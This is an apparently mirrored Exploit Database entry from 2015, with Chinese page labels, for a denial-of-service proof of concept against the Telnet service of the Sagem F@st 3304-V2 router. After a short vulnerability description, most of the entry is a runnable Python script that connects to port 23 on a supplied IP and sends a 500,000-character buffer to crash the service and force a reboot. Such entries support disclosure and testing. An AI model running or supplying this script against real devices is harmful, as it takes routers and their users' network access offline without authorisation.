Sagem F@st 3304-V2 – Telnet Crash (PoC)

• Exploit Database
• 103 阅读

• 作者： Loudiyi Mohamed
  日期： 2015-03-08
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/36309/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40

  # Title: Sagem F@st 3304-V2 Telnet Crash POC # Vendor : http://www.sagemcom.com # Severity : High # Tested Router: Sagem F@st 3304-V2 (3304-V1, other versions may also be affected) # Date : 2015-03-08 # Author : Loudiyi Mohamed # Contact: Loudiyi.2010@gmail.com # Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603 # Vulnerability description: #========================== #A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string. #This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000. #After the exploit is sent, the telnet service will crash and the router will reboot automatically. #Usage: python SagemDos.py "IP address"   # Code #======================================================================== #!/usr/bin/python import socket import sys print("######################################") print("#DOS Sagem F@st3304 v1-v2#") print("# ----------#") print("# BYLOUDIYI MOHAMED#") print("#####################################") if (len(sys.argv)<2): print "Usage: %s <host> " % sys.argv[0] print "Example: %s 192.168.1.1 " % sys.argv[0] exit(0) print "\nSending evil buffer..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((sys.argv[1], 23)) buffer = "X"*500000 s.send(buffer) except: print "Could not connect to Sagem Telnet!" #========================================================================